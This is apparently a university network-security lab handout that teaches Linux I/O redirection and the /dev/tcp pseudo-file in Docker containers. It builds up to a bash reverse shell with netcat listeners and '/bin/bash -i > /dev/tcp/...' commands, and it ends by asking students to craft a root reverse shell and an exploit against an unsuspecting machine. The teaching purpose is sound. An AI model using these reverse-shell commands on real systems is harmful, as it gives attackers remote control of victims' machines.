Table of contents

  1. Introduction
  2. Learning objectives
  3. Logistics
    1. Getting the configuration
    2. Patching the docker file
  4. Experiment 1: Process files
    1. Question sheet
    2. Kill the program
  5. Experiment 2: Redirection
    1. Question sheet
  6. Experiment 3: Redirection part 2
    1. Question sheet
  7. Experiment 4: Full on redirection
    1. Question sheet
  8. Experiment 5: Redirection to the outside of a machine
    1. Experiment 5.1: Input redirection with prompts
    2. Experiment 5.2: /dev/tcp
    3. Question sheet
  9. Experiment 6: Some bash fun
    1. Question sheet
    2. A bit more fun
    3. Optional: simple_prompt using remote input
  10. Final experiment: Reverse shell
    1. Question sheet


In this concept lab, we set out to investigate how to set up a reverse shell in a Linux environment. We will look a bit at how files are handled and see how we can use that to create a reverse shell from one machine to another.

Learning objectives

At the end of this concept lab, you should be able:

  • Define how input and output redirection works in Linux.
  • Create TCP connection without specifically creating a server.
  • Explore creating a reverse shell in Linux over a TCP connection.


Getting the configuration

To start with this concept lab, login to the class server, and navigate to your netsec-labs-username directory. Grab the latest updates using:

  (class-server) $ git fetch upstream
  (class-server) $ git pull upstream main

A folder called revshell should show up in your directory, that is where you will do most of your lab.

Patching the docker file

Before starting here, please make sure that your experiments from all other labs are down. To do so, navigate back to the latest lab directory and do docker compose down.

I have updated the patch script to no longer ask you for your username and subnet, it will try to extract those on its own and print out your subnet (it is the same on as the one announced on the Moodle page). Also, it now generates scripts for you to connect to your hosts quickly.

To do so, in the tcplab directory, run the patch script:

  (class-server) $ ./
  Attempting to fetch subnet automatically...
  Found your subnet, it is 10.10.0

If you had already patched your script, you will see something like this:

  (class-server) $ ./
  Attempting to fetch subnet automatically...
  Found your subnet, it is 10.10.0
  [ERROR] ########################################################################
  [ERROR] # It looks like your docker-compose.yml file has already been patched. #
  [ERROR] #                                                                      #
  [ERROR] # If you are having issues bringing up the environment, it means it is #
  [ERROR] #  still in use.                                                       #
  [ERROR] #                                                                      #
  [ERROR] # Try to take down the experiment first, then bring it up again.       #
  [ERROR] #  To bring it down: docker compose down                               #
  [ERROR] #  To bring it up:   docker compose up -d                              #
  [ERROR] ########################################################################

If for some reason, the script fails to find your subnet, you can override its behavior by providing your subnet on the command line:

  (class-server) $ ./ SUBNET

If all goes well, you should also see two new files in your directory: and You can use these scripts to directly connect to the desired host, without having to type the whole docker container exec -it command. Finally, I have also adjust the container’s hostnames to make it easier for you to identify which is which.

For example, to connect to client, you can use:

	$ ./

Hopefully, that would make things a bit easier for you.

If you are unable to execute a script due to a permissions issue, then try the following $ chmod +x <script> to make it executable and try again.

In the remainder of this document, I will not be using your specific prefixes and subnets. For example, when I refer to client, you should replace that with user-client where user is your RHIT username. Similarly, I will be using 10.10.0 as the default subnet, you should replace that in all IP addresses with your own subnet. For example, if your subnet is 10.11.0, then replace the IP address with

Experiment 1: Process files

Under the volumes directory, you will find a src/ directory that contains a simple program that prints out a message with its process id, and then enters an infinite loop.

In either of the containers, compile and run this code using:

$ make
$ ./simple_loop.bin
[./simple_loop.bin] Running process with pid = 26...
My file descriptors are the following:
  stdin:  0
  stdout: 1
  stderr: 2

The process id in your case will be different, make not of that value. This is the id of that program when it is running, i.e., when it is a process in the container. We would like to check out the files that this process has access to.

If you look at the source code (pasted below), you can see that the process, after printing its process id, prints out the values for each of its default open files:

  1. The standard input: stdin.
  2. The standard output: stdout.
  3. The standard error: stderr.
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv) {
  printf("[%s] Running process with pid = %d...\n", argv[0], getpid());

  printf("My file descriptors are the following:\n");
  printf("\t stdin:  %d\n", STDIN_FILENO);
  printf("\t stdout: %d\n", STDOUT_FILENO);
  printf("\t stderr: %d\n", STDERR_FILENO);



Let’s examine the actual files that these descriptors correspond to. To do so, make can make use of procfs, a virtual file system that allows us to read information about our processes. On the same container, while the program is still running, grab another terminal and check out the process’s files:

$ ls -al /proc/26/fd

This will print out where each of those files (stdin, stdout, and stderr) are mapped. For my case, it was something like the following:

lrwx------ 1 root root 64 Jan 11 16:42 0 -> /dev/pts/1
lrwx------ 1 root root 64 Jan 11 16:42 1 -> /dev/pts/1
lrwx------ 1 root root 64 Jan 11 16:42 2 -> /dev/pts/1

Question sheet

By looking at those value, answer the following question.

  1. Where do you think /dev/pts/1 points to?
    • Hint: Think of the normal behavior of any program, where do you read input from, where does your standard output and error go to?

Kill the program

You can now kill the running program using C-c on the terminal it is running into.

Experiment 2: Redirection

Next, let’s play around with these values and see where we can redirect them. Using the same source code, let’s first create a simple plaintext file that contains any garbage data you like. You can do that quickly using touch input.txt, this will create an empty file called input.txt.

Then, run the simple_loop.bin with the following command:

$ ./simple_loop.bin 0< input.txt

Based on the value of the process id, examine the file mappings for the newly created process.

Question sheet

After observing the file descriptor mappings for the process, answer the following questions:

  1. Where is stdin mapped for the process?

  2. What do you think the 0< syntax did when running simple_loop.bin?

Experiment 3: Redirection part 2

Let’s do one more experiment with redirection. Run our simple program as follows:

$ ./simple_loop.bin 1> output.txt

It is okay if you do not see any output show up on the console when you launch this command. To find the process id of this program, you can ask the kernel for it using:

$ pidof simple_loop.bin

It should give you the process id you are looking for.

Question sheet

Before you look at the file mappings, first, examine the content of the file output.txt. Based on your observations, answer the following question:

  1. Based on what we have seen in the previous experiment, what do you think the file mappings would be now?

After answering the previous question, examine the file mappings for that process, and confirm whether your expectations were correct. Then answer the following question:

  1. By combining your observations from experiments 2 and 3, can you suggest a method to map the standard error (stderr) of the process into a separate file? Write down such a command.
    • Hint: Feel free to experiment a bit and check out the mappings using the same techniques we did above.

Experiment 4: Full on redirection

Next, we will examine what we can do if we’d like to map different files to the same location (i.e., we’d like stdin to read from the same file that stdout outputs to).

Run simple_loop.bin with the following command:

$ ./simple_loop.bin > output.txt 0<&1

Question sheet

Examine the file mappings for the running process, and answer the following questions:

  1. Where are stdin and stdout mapped in this case?

  2. Based on that, what do you think the syntax 0<&1 is doing?

  3. Can you suggest a command that will redirect all of stdin, stdout, and stderr to the same file (e.g., output.txt)?

Experiment 5: Redirection to the outside of a machine

Now, check out the code in simple_prompt.c, it simply asks the user to enter a message, and then print out that message on the console. You can compile it using make and run it using ./simple_prompt.bin. Give it a shot and play around with it a bit.

Experiment 5.1: Input redirection with prompts

Using what we have done in the previous experiments, can you suggest a command for simple_prompt.bin to read its input from a file (say input.txt) instead of the waiting for the user to enter it from the command line?

  1. Please write down your command in the question sheet.

Experiment 5.2: /dev/tcp

In this experiment, we’d like to explore the /dev/tcp pseudo file. Much like /proc, Linux provides use with a pseudo file under /dev/tcp that allows you to set up a TCP connection to a remote machine, and then redirect your standard input, output, and error to that TCP connection.

Let’s exploit this fact to implement netcat without actually having netcat available for us. Grab two terminal windows, one running on the server container, and another running on the client container.

On the server, start a netcat server using:

$ nc -n -v -l 9090

This will start listening for incoming TCP connections on port 9090.

On the client machine, let’s send a message to this netcat server without actually using the nc command. To do so, use the following command:

$ echo 'Hello' > /dev/tcp/

Make sure to replace with the IP of your own server machine.

Question sheet

Observe what happens when the command above executes, and answer the following questions:

  1. Explain what echo 'Hello' > /dev/tcp/ did when you ran it? What do you think the /dev/tcp pseudo file is used for?

Experiment 6: Some bash fun

Now, let’s make things a bit more fun. Using the same setup, start a netcat server on the server machine using:

$ nc -n -v -l 9090

However, on the client side, run the following command:

$ /bin/bash -i > /dev/tcp/

You will notice that you are still in bash, however, a new instance of bash has been created in interactive mode.

Question sheet

Before you test any commands, answer the following question:

  1. By looking at the command on the client, where do you expect the output of your commands to show up?

Next, let’s confirm your intuition, try to list the files in the current directory using ls on the client machine. Where does the output show up?

A bit more fun

On the client machine, start a vim session. You will receive a warning from vim that the output is funky, ignore that. A few moment later, vim will show up on the server container all the while allowing you to edit and enter command from the client container.

We have just offloaded the rendering of the vim session to the server all the while doing the editing commands on the client container.

Try it out with a few other commands, then when you are ready, kill both sessions at the server and the client. You might need to manually force the server to exit using C-c on the server for the connection to be dropped (though it depends on which commands you have tried).

Optional: simple_prompt using remote input

This experiment is optional, though it might be helpful with the last experiment. On the server container, launch a netcat server using:

$ nc -n -v -l 9090

On the client container, launch the simple_prompt.bin program while asking it to read the input from the server connection.

$ ./simple_prompt.bin 0< /dev/tcp/

The client’s program will hang waiting for input, however try as you can you will not be able to provide it with input. However, switch to the server container, on the same terminal that is running the netcat server, and type hello and <Enter> there, you will see that this message will be sent out to the client’s simple_prompt.bin program, thus unlocking it and causing it to print out its message.

Final experiment: Reverse shell

Our goal here is to have the client give the server a root shell, allowing it full control over its machine. That is eventually the exploit that we’d like to create.

Starting with the same setup, start a netcat server on the server container using:

$ nc -n -v -l 9090

On the client, design a command that will allow you to create a new client shell but on the server machine. In other words, what we’d like to happen is that after launching this command, the server will find itself with a full blown root shell running on the client, doing whatever it likes to that client.

Question sheet

  1. Write down the command you used to establish a client root shell on the server container.

  2. Given what we have discussed in the TCP concept lab and the vulnerabilities in TCP, can you design an exploit that allows you to perform such an attack on an unsuspecting machine?